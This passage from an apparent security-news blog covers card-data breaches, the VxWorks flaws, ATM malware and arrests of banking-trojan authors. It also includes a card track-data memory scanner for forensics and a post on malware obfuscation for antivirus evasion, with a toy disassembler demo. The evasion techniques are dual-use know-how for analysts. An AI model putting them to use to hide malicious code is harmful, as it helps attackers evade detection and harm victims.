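    for off, pan, exp in find_track2(SAMPLE_DUMP):
        print(f"offset {off}: PAN {pan} expires {exp}")
```

Running it over a real memory image answers the question a PoS breach investigation has to answer first: whether card data was resident in clear text at all, and in which process.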

Source:http://securityaffairs.co/

Russian hacker Responsible for Massive Data Breach Finally Pleads Guilty

Posted on

The infamous Russian hacker, Vladimir Drinkman, has admitted his contribution in what has been regarded by the Justice Department as “the largest such scheme ever prosecuted in the United States.”

Vladimir Drinkman has pleaded guilty and faces court trial along with four other defendants. The group was accused of hacking corporate computers, including machines owned by firms such as Diners Singapore, Nasdaq, JCP, 7-Eleven, Dow Jones, Jet Blue, Ingenicard and Visa Jordan, and stealing around 160 million credit card numbers. Because of the hacks they conducted, the corporate sector suffered great losses (approximately $300 million), which doesn’t include the losses suffered by private individuals whose credit card data was also stolen.


Drinkman initially pleaded not guilty after being caught while travelling to Amsterdam in 2010. He was immediately sent to the United States to face trial. This year, however, he changed his tune completely when he was brought before Chief Judge Jerome Simandle in a New Jersey district court.

The US Department of Justice maintains that this group of hackers would monitor the computer systems of their targets for months on end and then exploit the SQL database vulnerabilities they had identified to infiltrate those networks. Usually, they would leave a backdoor open to compromise the network again later. They exploited the security holes to install “sniffers,” a type of malware that gathers and pilfers user data such as Social Security numbers, credit card numbers and similar crucial information from the targeted computers. These details were then sold to shady online entrepreneurs, who in turn sold them on various online forums.

Reports suggest that Drinkman and his fellow hackers were extremely careful in their feats: they communicated only over encrypted channels and even used security software to add a layer of protection. They also altered the network settings of their victims to prevent their actions from being logged on the computers. Despite all these measures, Drinkman and his co-defendants are now behind bars and face a maximum penalty of 30 years in prison. Since Drinkman has pleaded guilty, his sentence might be lighter than that of his associates. But we cannot be sure about their sentences until the group is actually convicted on 15th January 2016.

Source:https://www.hackread.com

NATO Will Check for Backdoors in Microsoft’s Products

Posted on

Microsoft has taken NATO on board in its program, which presents information about vulnerabilities and provides access to source code.

A Security Agreement between NATO and Microsoft has been signed, which gives NATO the authority to vet the source code of Microsoft’s products for backdoors.

This deal can be regarded as an extension of the 12-year cybersecurity partnership that Microsoft has had with the NATO Communications and Information (NCI) Agency. It also marks NATO’s signing of the Redmond company’s latest Government Security Program (GSP) agreement.

A similar deal between EU and Microsoft was signed in June this year after which the Windows developer established its second European Transparency Centre in Brussels. This facility has been opened to allow governments to have a safe place to review its source code.


Microsoft explained that this deal will give the NCI agency powers to access technical information and documentation about the products and services of Microsoft along with product vulnerability information and threat intelligence.

Koen Gijsbers, NCI Agency General Manager, said:

“NATO is facing new and increasingly dangerous threats to cybersecurity across the world and these threats could affect national economies and citizens. To avoid it, NCI Agency strongly believes in rapid and early information sharing on threats and vulnerabilities with leading companies worldwide, such as Microsoft. Trust is the key to success.”

GSP was launched by Microsoft in 2003 and since then, the program has evolved greatly. Over time, it’s been transformed into a series of resources that offer government officials controlled access to its Transparency Centers, its source code and Microsoft’s vulnerability and threat intelligence services.

Currently, the products that can be vetted by NATO include different versions of Windows, Windows Servers, Windows Embedded and Lync SharePoint 2010.

After this recent development with NATO, Microsoft now has the backing of 44 agencies participating in this program from 26 governments across the globe.

According to sources at Microsoft, the GSP will also facilitate participants in planning for deployments of Windows 10 and the movement of services to the cloud.

This agreement was publicly signed at NATO’s annual cyber conference and it further progressed in the organization’s initiative called NATO-Industry Cyber Partnership. This initiative was launched in 2014. It aims to engage academia and industry partners with the 28 allies of NATO and enhance its defenses against hack-attacks that might damage its physical infrastructure.

This is not the first time NATO has gone into a deal with an institution to tackle cyber threats. NATO is also assisting Jordan to fight off ISIS cyber attacks.

Source:https://www.hackread.com

Backdoor Found in NASA’s Curiosity Rover Operating System

Posted on

A security researcher has uncovered two vulnerabilities in the VxWorks operating system, used among other things, with NASA’s Curiosity rover.

The researcher’s paper does not target NASA and Curiosity specifically, but the operating system on which the rover runs, VxWorks, used on Mars in one device and on Earth in over 1.5 billion.

VxWorks, a very secure real-time OS for the Internet of Things

The operating system, created in 1987 by US company Wind, an Intel subsidiary, has been deployed in countless devices ranging from Boeing 787 planes to industrial robots, from network routers to medical equipment.

Yannick Formaggio, a Canadian security expert, was asked by one of his clients to conduct research into the operating system’s security features before making a decision to deploy it for their own industrial equipment.

After conducting his inspection, Mr. Formaggio found the “real-time” OS to be very secure, with the exception of two critical issues.

Issues found: a backdoor and a ring buffer overflow

The first is a backdoor, which could be created without detection, if he supplied negative values in the login fields.

This allowed Formaggio to bypass memory protections and create a root level account on the operating system without having proper credentials to do so.

The second was a ring buffer overflow in VxWorks operating system built-in FTP server, which crashed when it received maliciously crafted username & password details at very high speeds. This bug only led to a Denial of Service (DoS) for the device’s network capabilities.


Affected VxWorks versions are 5.5 to 6.9.4.1. Wind was informed of the flaws at the end of July and has provided patches.

VxWorks is one of the most widely used operating systems for connecting IoT-enabled devices, and the flaw was remotely exploitable and invisible to legitimate administrators. It is recommended that all VxWorks devices be updated as soon as possible.

Mr. Formaggio presented his research at the 44CON security conference in London.

Source:http://news.softpedia.com/

Microsoft released security updates to fix critical vulnerabilities

Posted on

Recently Microsoft addressed vulnerabilities in its recent products. Some of the bugs were severe to the extent that they can enable remote code execution.

Wolfgang Kandek, CTO of Qualys, confirmed that the highest priority patch is MS15-097, which includes critical bug fixes for Windows Vista, Windows Server 2008, Microsoft Office 2007 and 2010, and Lync 2007, 2010, and 2013.


Talking about bugs, there was a Win32k memory leak, CVE-2015-2546, found in all versions of Windows; it was deemed important and discussed openly. One of the other flaws was CVE-2015-2545, a malformed EPS file bug in Microsoft Office. This bug allowed remote code execution and has been fixed in bulletin MS15-099 along with other bug fixes.

Other bulletins with bug fixes have been released, namely MS15-094 through MS15-103. MS15-094 addresses the browser issues, that is, the vulnerabilities in Internet Explorer and the Edge browser are fixed in this bulletin. MS15-098 addresses remote code execution through the Journal bug, and MS15-103 addresses problems in Exchange servers, such as those affecting Microsoft Outlook.

Source:http://www.ehackingnews.com/

FireEye: First multi-vendor ATM malware targeting cardholders

Posted on

Malware has been used to make ATMs dispense cash since as far back as 2013, but FireEye Labs said on Friday that it had discovered the first multi-vendor ATM malware specifically targeting cardholders.

The malware – detected as Backdoor.ATM.Suceful, or SUCEFUL – appears to have been created on Aug. 25, was recently uploaded to VirusTotal from Russia, and could possibly still be in its development phase, a Friday post said.

In Diebold or NCR ATMs, SUCEFUL is potentially capable of reading all credit and debit card track data, reading data from the chip of the card, and suppressing ATM sensors to avoid detection, the post said, adding that control of the malware could also be possible via the ATM PIN pad.


Perhaps most noteworthy is that the malware is capable of retention or ejection of the card on demand, which could be used to steal the physical card. The post described a situation where a person’s card is not ejected, they walk away to ask for help, and during that time the attackers eject and steal the card.

So far FireEye has no evidence of how the malware gets installed on ATMs since it has not been observed in the wild, Daniel Regalado, senior staff malware researcher with FireEye, told SCMagazine.com in a Friday email correspondence.

Regalado said that “previous ATM threats like Ploutus or Padpin suggest that the crooks either open the upper portion of the ATM to insert a CD-ROM/ USB to transfer the malware, or hire employees with access to these machines to perform the installation.”

SUCEFUL works by interacting with middleware known as XFS Manager.

“One benefit of the XFS Manager is that it is vendor independent, similar to Java’s “Write once, run anywhere” mantra,” the post said. “This means that it can be used maliciously by ATM malware, so that it can run transparently in multiple hardware vendors. This is the case of SUCEFUL, which is targeted for Diebold and NCR [ATMs].”

For those whose cards get stuck in an ATM, FireEye recommended keeping the bank’s contact number handy so a call can be made without having to walk away from the machine.

Source:http://www.scmagazine.com/

Malware code obfuscation methodologies for antivirus evasion

Posted on

According to information security professionals, the two main reasons for using code obfuscation in malware are:

  1. To deter static reverse engineering of the malware. It becomes harder to focus on the most important code sections.
  2. So that the static signatures used by AV vendors cannot detect the malware, since those signatures are based on specific byte sequences in the binary.

Let us understand, with the help of IICS's ethical hacking training and services experts, the methodologies that malware programmers use. Below are different methodologies used by malware programmers to obfuscate control flow in malware.


Obfuscation through application-defined callback functions

There are certain APIs provided by Microsoft that let us register a callback function. Malware can use these to hide the main logic of its code: a pointer to the malicious subroutine is passed as the callback parameter of the API. When a window is created using CreateWindowA(), the window procedure is invoked with certain default messages such as WM_CREATE, WM_NCCREATE and so on. However, the main virus code executes only when one particular window message is received, explains Bill Smith, cloud security expert, who leads the cloud malware analysis team.

Execution through exception handling

Malware can also redirect execution to the malicious subroutine by triggering an exception. To do so, it first registers an exception handler using RtlAddVectoredExceptionHandler() or by registering a new structured exception handler.

Experts from an information security company explain that the exception can be raised using any of the following:

  1. Triggering a memory access violation, by trying to write to a memory address that has no write access or by trying to call an invalid memory address.
  2. Executing a privileged instruction such as STI or CLI, which raises a privileged-instruction exception in protected mode.
  3. Performing a division by zero to trigger the exception.

Controlling the debugger

According to ethical hacking experts, there are certain special instructions or instruction sequences that, when executed inside a debugger, change the debugger's default behaviour. This helps obfuscate the code's control flow in the debugger and makes the code harder to understand.

INT 2D has special behaviour in OllyDbg: Olly skips the next byte during execution, which obfuscates the control flow. This technique is often referred to as byte scission. It also behaves differently in different environments.

Overwrite RETN: This is a special behaviour observed in OllyDbg. If we overwrite the RETN instruction with the opcode 0xC3 (which is the opcode of RETN itself) just before RETN executes, the debugger does not stop at the RETN address; instead, the code keeps running inside the debugger.

Junk instructions

There are several polymorphic engines that malware authors use to generate modified versions of their binary which perform the same activities on the machine but with different code, explains Bill Smith, cloud security services expert. This is often used to evade the static signatures that security vendors write to detect malware. One of the important features of a polymorphic engine is the junk instruction generator. Junk instructions are instruction sequences that do not affect the overall logic of the code in any way, but are placed to deter reverse engineering. Between each useful instruction, several junk bytes are placed. The main reasons for injecting junk instructions into the code section are:

  1. These junk bytes may correspond to instructions that do not alter the overall logic of the code. They increase the size of the code section and deter reverse engineering, because although these instructions look legitimate they have no impact on the main behaviour of the virus.
  2. Junk instructions injected into the instruction stream may correspond to partial instructions. This is done to confuse disassemblers that rely on algorithms such as linear sweep and recursive traversal.
  3. The code can be obfuscated further by using opaque predicates, which can be combined with Windows APIs that always return a fixed value.
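Point 2 is easiest to see by running the two disassembly strategies over the same bytes. The Python below is an added example, not code from the article or from IICS: it implements a tiny decoder for a handful of x86 opcodes (nop, ret, jmp rel8, je rel8, mov eax,imm32, xor eax,eax) and a constructed 7-byte sample in which a jmp hops over a single junk byte, 0xB8, the first byte of a 5-byte mov. Linear sweep, which decodes bytes consecutively, swallows the real xor and ret into a bogus mov eax,imm32; recursive traversal, which follows control-flow edges, never decodes the junk byte. The je decoder deliberately reports both the fall-through and the target as successors, which is why the opaque predicates of point 3 confuse recursive traversal as well: the disassembler cannot know that one edge is never taken.

```python
import struct


def decode(code: bytes, off: int):
    """Decode one instruction of a tiny x86 subset at offset off.
    Returns (text, length, successors); successors are offsets control may reach next."""
    op = code[off]
    if op == 0x90:
        return "nop", 1, [off + 1]
    if op == 0xC3:
        return "ret", 1, []
    if op == 0xEB and off + 2 <= len(code):            # jmp rel8
        rel = struct.unpack_from("b", code, off + 1)[0]
        target = off + 2 + rel
        return f"jmp short 0x{target:x}", 2, [target]
    if op == 0x74 and off + 2 <= len(code):            # je rel8: both edges are possible
        rel = struct.unpack_from("b", code, off + 1)[0]
        target = off + 2 + rel
        return f"je short 0x{target:x}", 2, [off + 2, target]
    if op == 0xB8 and off + 5 <= len(code):            # mov eax, imm32
        imm = struct.unpack_from("<I", code, off + 1)[0]
        return f"mov eax, 0x{imm:x}", 5, [off + 5]
    if op == 0x31 and off + 2 <= len(code) and code[off + 1] == 0xC0:
        return "xor eax, eax", 2, [off + 2]
    return f"db 0x{op:02x}", 1, [off + 1]               # unknown or truncated opcode


def linear_sweep(code: bytes):
    """Decode consecutively from offset 0, ignoring control flow."""
    out, off = [], 0
    while off < len(code):
        text, length, _ = decode(code, off)
        out.append((off, text))
        off += length
    return out


def recursive_traversal(code: bytes, entry: int = 0):
    """Follow control-flow edges from the entry point; unreachable bytes are never decoded."""
    seen, work = {}, [entry]
    while work:
        off = work.pop()
        if off in seen or not 0 <= off < len(code):
            continue
        text, _, succ = decode(code, off)
        seen[off] = text
        work.extend(succ)
    return dict(sorted(seen.items()))


# Constructed sample: a jmp skips one junk byte (0xB8, the first byte of a 5-byte
# mov eax, imm32) placed in front of the real instructions.
#   00: EB 01      jmp short 0x3
#   02: B8         junk byte (never executed)
#   03: 31 C0      xor eax, eax
#   05: C3         ret
#   06: 90         padding (unreachable)
SAMPLE = bytes([0xEB, 0x01, 0xB8, 0x31, 0xC0, 0xC3, 0x90])

if __name__ == "__main__":
    print("linear sweep:")
    for off, text in linear_sweep(SAMPLE):
        print(f"  {off:02x}: {text}")
    print("recursive traversal:")
    for off, text in recursive_traversal(SAMPLE).items():
        print(f"  {off:02x}: {text}")
```

The linear sweep output shows two instructions and no ret at all, which is exactly the picture a signature or a quick static pass would get; the recursive traversal recovers the three real instructions at offsets 0, 3 and 5.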

There are a few more code obfuscation techniques used by hackers, Bill Smith mentions, which anyone with experience in information security or cloud security can easily understand, and we will cover those in the next article.

Pentagon Hacked Again, Credit Card Data Stolen

Posted on

In August, we reported how the Pentagon had its unclassified email server hacked, allegedly by Russian hackers, with a sophisticated phishing attack.

Now, reportedly, the computer systems of the Pentagon’s food court were infiltrated by hackers, and as a result the bank details of an unspecified number of employees were leaked.

The official spokesman of Defense Department, Lt. Col. Tom Crosson, revealed on Tuesday that it was possible that the bank account information of the food court employees got leaked. Employees who paid concessions at the Pentagon with either debit or credit card were notified about the hack.


Washington Examiner reports that the notification to the employees from the Pentagon read:

“Within the past week, the Pentagon Force Protection Agency has received numerous reports of fraudulent use of credit cards belonging to Pentagon personnel. These individuals had fraudulent charges to their account soon after they had legitimate transactions at the Pentagon.”

Crosson did not explain exactly how many people were affected by the hack and only said that the Pentagon Force Protection Agency is already investigating the matter. The particular food court that was attacked by hackers also hasn’t been identified yet.

In August 2015, United States military officials blamed Russian hackers for snooping on the Pentagon’s unclassified email server used by Joint Chiefs personnel.

The cyber-attack affected the emailing accounts of about 4,000 military officials, confirmed by a U.S. official familiar with the hacking attempt.

Source:https://www.hackread.com

Authorities Arrest Creators of Dridex and Citadel Banking Trojans

Posted on

Law enforcement in Cyprus and Norway have arrested two men considered to be key players in the creation and distribution of Dridex and Citadel respectively, two very powerful and highly efficient banking trojans.

The first is an unnamed 30-year-old man from the Republic of Moldavia, whom authorities arrested while he was trying to cheat a bank out of $3.5 million / €3.12 million.

The man was detained in a rented house in Paphos, a vacation town in Cyprus, where he was temporarily living with his wife.

The arrest was carried out after an anonymous tip was received, and sources close to the investigation claim the man was a key figure in an international organized crime gang responsible for distributing the Dridex (Cridex, Bugat, Dyre) banking trojan, as security researcher Brian Krebs reports.


The man in question seems to also have been part of the famous Business Club APT group, which operated the Gameover Zeus botnet that infected over 500 million PCs and was responsible for stealing around $100 million / €90 million from various banking and financial institutions.

Meanwhile in Norway…

Eleven months earlier in Fredrikstad, Norway, a 27-year-old Russian man known as Mark was also arrested, being detained at the FBI’s request.

According to a Norwegian newspaper, the man has been charged with running the Citadel malware-as-a-service product, used previously to infect users with spyware and exfiltrate banking-related details by logging keystrokes and capturing video and images from the victim’s computer.

Citadel operated since 2012, and there are known cases when it was also used to distribute the Reveton ransomware.

According to sources in the US Justice Department, investigators have solid evidence that Mark is actually Aquabox, Citadel’s creator and proprietor.

The Russian man has been held under house arrest for the past 11 months while authorities wait for extradition procedures to the US to be completed.

As with Mark, Dridex’s creator is now also facing extradition to the US.